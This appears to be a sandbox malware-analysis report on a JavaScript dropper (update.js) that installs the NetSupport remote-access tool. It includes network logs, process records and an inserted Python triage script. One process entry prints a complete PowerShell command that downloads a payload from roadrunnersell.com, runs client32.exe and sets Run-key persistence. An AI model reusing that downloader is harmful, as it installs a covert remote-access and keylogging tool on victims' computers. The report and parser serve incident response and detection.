                                                                               2024-09-25 17:02:13 UTC | 16384 | IN | Data Raw: 63 20 3c 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 63 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 66 29 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 2e 6c 65 6e 67 74 68 3b 20 67 20 2b 3d 20 38 31 39 32 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 45 61 28 66 2c 20 67 2c 20 67 20 2b 20 38 31 39 32 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 20 3d 20 50 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6c 20 3d
                                                                              Data Ascii: c < arguments.length; c++) { var f = arguments[c]; if (Array.isArray(f)) for (var g = 0; g < f.length; g += 8192) { var h = Ea(f, g, g + 8192); h = Pa.apply(null, h); for (var l =
                                                                               2024-09-25 17:02:13 UTC | 16384 | IN | Data Raw: 20 20 69 66 20 28 63 20 26 26 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 61 20 3d 20 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 20 22 37 2e 30 22 20 3d 3d 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 20 26 26 20 61 5b 31 5d 29 20 73 77 69 74 63 68 20 28 61 5b 31 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 34 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 22 38 2e 30 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 35 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20
                                                                              Data Ascii: if (c && c[1]) if (a = /Trident\/(\d.\d)/.exec(a), "7.0" == c[1]) if (a && a[1]) switch (a[1]) { case "4.0": b = "8.0"; break; case "5.0": b
                                                                               2024-09-25 17:02:13 UTC | 16384 | IN | Data Raw: 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 66 61 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 68 65 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 69 77 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 70 73 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 73 64 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73
                                                                              Data Ascii: ALE.substring(0, 2).toLowerCase() || "fa" == k.LOCALE.substring(0, 2).toLowerCase() || "he" == k.LOCALE.substring(0, 2).toLowerCase() || "iw" == k.LOCALE.substring(0, 2).toLowerCase() || "ps" == k.LOCALE.substring(0, 2).toLowerCase() || "sd" == k.LOCALE.s
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 74 68 29 20 72 65 74 75 72 6e 20 21 31 3b 0a 20 20 20 20 61 20 3d 20 61 2e 6d 61 74 63 68 28 2f 5b 3f 26 5d 62 6f 64 79 3d 28 5b 5e 26 5d 2a 29 2f 29 5b 31 5d 3b 0a 20 20 20 20 69 66 20 28 21 61 29 20 72 65 74 75 72 6e 20 21 30 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 5e 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 5f 2e 7e 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2b 24 2f 69 2e 74 65 73 74 28 61 29 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 53 61 66 65 55 72 6c 2e 66 72 6f 6d 53 73 68 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e
                                                                              Data Ascii: th) return !1; a = a.match(/[?&]body=([^&]*)/)[1]; if (!a) return !0; try { decodeURIComponent(a) } catch (c) { return !1 } return /^(?:[a-z0-9\-_.~]|%[0-9a-f]{2})+$/i.test(a)};k.html.SafeUrl.fromSshUrl = function
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 2b 20 62 20 2b 20 27 22 20 72 65 71 75 69 72 65 73 20 67 6f 6f 67 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 20 76 61 6c 75 65 2c 20 22 27 20 2b 20 63 20 2b 20 27 22 20 67 69 76 65 6e 2e 27 20 3a 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 69 6e 20 6b 2e 68 74 6d 6c 2e 53 61 66 65 48 74 6d 6c 2e 55 52 4c 5f 41 54 54 52 49 42 55 54 45 53 5f 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 29 20 63 20 3d 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 2e 75 6e 77 72 61 70 28 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 63 20 69
                                                                              Data Ascii: + b + '" requires goog.string.Const value, "' + c + '" given.' : ""); if (b.toLowerCase() in k.html.SafeHtml.URL_ATTRIBUTES_) if (c instanceof k.html.TrustedResourceUrl) c = k.html.TrustedResourceUrl.unwrap(c); else if (c i
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 2c 20 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 74 5c 72 5c 6e 20 5d 2b 7c 5b 5c 74 5c 72 5c 6e 20 5d 2b 24 2f 67 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 20 3d 20 6b 2e 73 74 72 69 6e 67 2e 69 6e 74 65 72 6e 61 6c 2e 74 72 69 6d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 4c 65 66 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 78 61 30 5d 2b 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 74 72 69 6d 52 69 67 68 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 73 5c 78 61 30 5d 2b 24 2f 2c 20 22 22 29 0a 7d 3b 0a 6b 2e 73 74 72 69 6e 67 2e 63 61 73
                                                                              Data Ascii: , " ").replace(/^[\t\r\n ]+|[\t\r\n ]+$/g, "")};k.string.trim = k.string.internal.trim;k.string.trimLeft = function(a) { return a.replace(/^[\s\xa0]+/, "")};k.string.trimRight = function(a) { return a.replace(/[\s\xa0]+$/, "")};k.string.cas


                                                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                              1           192.168.2.16  49705        79.141.163.131  443               6632  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-09-25 17:02:35 UTC  84                 OUT        GET /trade/d.php?5517 HTTP/1.1
                                                                              Host: roadrunnersell.com
                                                                              Connection: Keep-Alive
                                                                              2024-09-25 17:02:35 UTC  198                IN         HTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:35 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Vary: Accept-Encoding
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                              2           192.168.2.16  49709        79.141.163.131  443               6612  C:\Windows\System32\wscript.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-09-25 17:02:49 UTC  384                OUT        POST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-09-25 17:02:49 UTC  7                  OUT        Data Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                              2024-09-25 17:02:49 UTC  166                IN         HTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:49 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session ID  Source IP     Source Port  Destination IP  Destination Port
                                                                              3           192.168.2.16  49710        79.141.163.131  443
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-09-25 17:03:54 UTC  384                OUT        POST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-09-25 17:03:54 UTC  7                  OUT        Data Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                              2024-09-25 17:03:54 UTC  166                IN         HTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:03:54 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Target ID:0
                                                                              Start time:13:01:54
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:13:02:07
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                              Imagebase:0x7ff7582a0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E6081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E61D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E60AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1694167598.000001C0E5E6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6684c0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:12
                                                                              Start time:13:02:30
                                                                              Start date:25/09/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                                                              Imagebase:0x7ff6843f0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:13
                                                                              Start time:13:02:37
                                                                              Start date:25/09/2024
                                                                              Path:C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
                                                                              Imagebase:0x9f0000
                                                                              File size:103'824 bytes
                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2636997048.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2728193047.000000006CBA0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 27%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:false
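The three process entries above carry the whole infection chain a responder wants out of a sandbox report: wscript.exe executing update.js from the user's Desktop, and seven seconds later client32.exe starting from a freshly created folder under AppData\Roaming with a NetSupport Yara hit and elevated privileges, while conhost.exe (also elevated) is benign noise. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's Target ID block layout from a constructed excerpt that mirrors the entries above and flags that chain. The USER_WRITABLE markers, the script-host heuristic and the KNOWN_BAD_MD5 table are illustrative assumptions (the MD5 in the table is the client32.exe hash shown above, not a published IOC list).

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed excerpt (not the report itself): layout and values copied from the
# three Target ID blocks above, trimmed to the fields the triage needs.
SAMPLE_REPORT = r"""
Target ID:11
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true

Target ID:12
Path:C:\Windows\System32\wscript.exe
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:false

Target ID:13
Path:C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
Commandline:"C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
MD5 hash:C4F1B50E3111D29774F7525039FF7086
Has elevated privileges:true
Yara matches:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 27%, ReversingLabs
"""

# Heuristics below are illustrative assumptions, not Joe Sandbox signatures.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
KNOWN_BAD_MD5 = {"C4F1B50E3111D29774F7525039FF7086": "NetSupport client32.exe dropped in this report"}
BULLET = "• "


@dataclass
class Process:
    target_id: int
    fields: dict[str, str] = field(default_factory=dict)  # scalar Key:Value lines
    yara_rules: list[str] = field(default_factory=list)
    av_matches: list[str] = field(default_factory=list)


def parse_targets(text: str) -> list[Process]:
    """Split the report into blank-line-separated 'Target ID' blocks.

    Values are split on the first ':' only, so drive letters and quoted command
    lines survive intact; '•' bullets attach to the preceding list header.
    """
    procs: list[Process] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        proc, list_key = None, None
        for line in (ln.strip() for ln in block.splitlines() if ln.strip()):
            if line.startswith(BULLET) and proc is not None:
                entry = line[len(BULLET):]
                if list_key == "Yara matches":
                    m = re.match(r"Rule:\s*([^,\s]+)", entry)
                    if m:
                        proc.yara_rules.append(m.group(1))
                elif list_key == "Antivirus matches":
                    proc.av_matches.append(entry)
                continue
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if key == "Target ID":
                proc = Process(target_id=int(value))
                procs.append(proc)
            elif proc is not None:
                list_key = key if not value else None  # header of a bullet list
                if value:
                    proc.fields[key] = value
    return procs


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def findings_for(proc: Process) -> list[str]:
    """Reasons this process looks like part of a script-dropper -> RAT chain."""
    out: list[str] = []
    path = proc.fields.get("Path", "")
    tokens = [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', proc.fields.get("Commandline", ""))]
    if _basename(path) in SCRIPT_HOSTS:
        for arg in tokens[1:]:
            if arg.lower().endswith(SCRIPT_EXT) and "\\users\\" in arg.lower():
                out.append(f"script host ran a script from a user profile: {arg}")
    if any(marker in path.lower() for marker in USER_WRITABLE):
        out.append(f"executable launched from a user-writable directory: {path}")
    if any("netsupport" in rule.lower() for rule in proc.yara_rules):
        out.append("Yara: NetSupport remote tool matched on disk or in memory")
    md5 = proc.fields.get("MD5 hash", "").upper()
    if md5 in KNOWN_BAD_MD5:
        out.append(f"MD5 {md5} matches IOC: {KNOWN_BAD_MD5[md5]}")
    # Privilege alone is not a finding: conhost.exe also runs elevated in this report.
    if out and proc.fields.get("Has elevated privileges") == "true":
        out.append("runs with elevated privileges")
    return out


def triage(report_text: str) -> dict[int, list[str]]:
    """Map Target ID -> findings for every process that tripped at least one heuristic."""
    return {p.target_id: f for p in parse_targets(report_text) if (f := findings_for(p))}


def dropped_iocs(report_text: str) -> list[tuple[str, str]]:
    """(path, MD5) of each flagged process whose image lives in a user-writable directory."""
    return [(p.fields["Path"], p.fields["MD5 hash"].upper())
            for p in parse_targets(report_text)
            if findings_for(p) and any(m in p.fields["Path"].lower() for m in USER_WRITABLE)]


if __name__ == "__main__":
    for tid, reasons in triage(SAMPLE_REPORT).items():
        print(f"Target {tid}: " + "; ".join(reasons))
    print("IOCs:", dropped_iocs(SAMPLE_REPORT))
```

Feed it the Target ID section of any Joe Sandbox text export; fields the parser does not know about stay in `fields`, so a heuristic on `Wow64 process (32bit)` or `Reputation` can be added to `findings_for` without touching the parser, and `dropped_iocs` gives the path and hash to block or hunt for.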

                                                                                Execution Graph

                                                                                Execution Coverage:3.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:14
                                                                                Total number of Limit Nodes:1
                                                                                 Execution graph (rendered figure; the node list recovered from the page shows three short call chains in the powershell dump region 0x7FFEC8320000):
                                                                                 • 7ffec8323b8e → 7ffec8322bd0 → 7ffec833c993 (GetSystemInfo) → 7ffec8323c13, with a bypass edge 7ffec8322bd5 → 7ffec833c900 → 7ffec8323c13
                                                                                 • 7ffec8327e98 → 7ffec8327e9d (GetFileAttributesW) → 7ffec8327f36
                                                                                 • 7ffec832894a → 7ffec833c210 (ComputeAccessTokenFromCodeAuthzLevel) → 7ffec833c2be

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10285725d863a60091d10a7b0224442b4a472c278ffaffa49c4fcc5dfcb67ee6
                                                                                • Instruction ID: ef1b9c4960484e94afcb7c996b9f79ac9e433707a991b8669c2ebbdbdf056560
                                                                                • Opcode Fuzzy Hash: 10285725d863a60091d10a7b0224442b4a472c278ffaffa49c4fcc5dfcb67ee6
                                                                                • Instruction Fuzzy Hash: 6741277290CA4D8FE758DB6C88156E97BE0FFA6320F08427EE04CD3292DB246547C785

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                • String ID:
                                                                                • API String ID: 132034935-0
                                                                                • Opcode ID: 9d395035121c7c6bc089472c01f5d7ce9c2ae1c118681500959ef15729175f3f
                                                                                • Instruction ID: f6d8cc548729f0e29a956dc495d9c45a9550656606302ce964a61d08ff5a2972
                                                                                • Opcode Fuzzy Hash: 9d395035121c7c6bc089472c01f5d7ce9c2ae1c118681500959ef15729175f3f
                                                                                • Instruction Fuzzy Hash: 9131C431908A1C8FDB18DF9CD8456F97BE1FBA9711F04422EE04AD3252CB70A816CB85

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: d033f17036ce914fede4ff548b84bfe248c866031e712f9d36e83d4e4ccc62d2
                                                                                • Instruction ID: e8a903cc351e9ce4ff28014b073800f8facd7a32cdfb861de8fd655b5baa7636
                                                                                • Opcode Fuzzy Hash: d033f17036ce914fede4ff548b84bfe248c866031e712f9d36e83d4e4ccc62d2
                                                                                • Instruction Fuzzy Hash: E0216D71908A1C9FDB58DF98C849AFABBE1FB59311F14822ED00AD3652DB70A845CB91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2528539037.00007FFEC8320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8320000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2f223333077c72292b03a41cac1d5991676a9e8241f450e5d1b19598da530724
                                                                                • Instruction ID: 4bc1c49443aebc33cf413aac8bcaa5be45509a1139fefb6b4766d3c5253073da
                                                                                • Opcode Fuzzy Hash: 2f223333077c72292b03a41cac1d5991676a9e8241f450e5d1b19598da530724
                                                                                • Instruction Fuzzy Hash: 16218E31908A1C9FDB58DF5C9849AE9BBE1FB55311F04822BD009D3652DB70A855CB81

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 053865a754ef27303a4a82f663568a21f2d7d56ad8d9d32930704d29fd49c5fd
                                                                                • Instruction ID: b5c3580a9fd27261874dc42d9e7945ec740beb34508687254575cfcab84e2924
                                                                                • Opcode Fuzzy Hash: 053865a754ef27303a4a82f663568a21f2d7d56ad8d9d32930704d29fd49c5fd
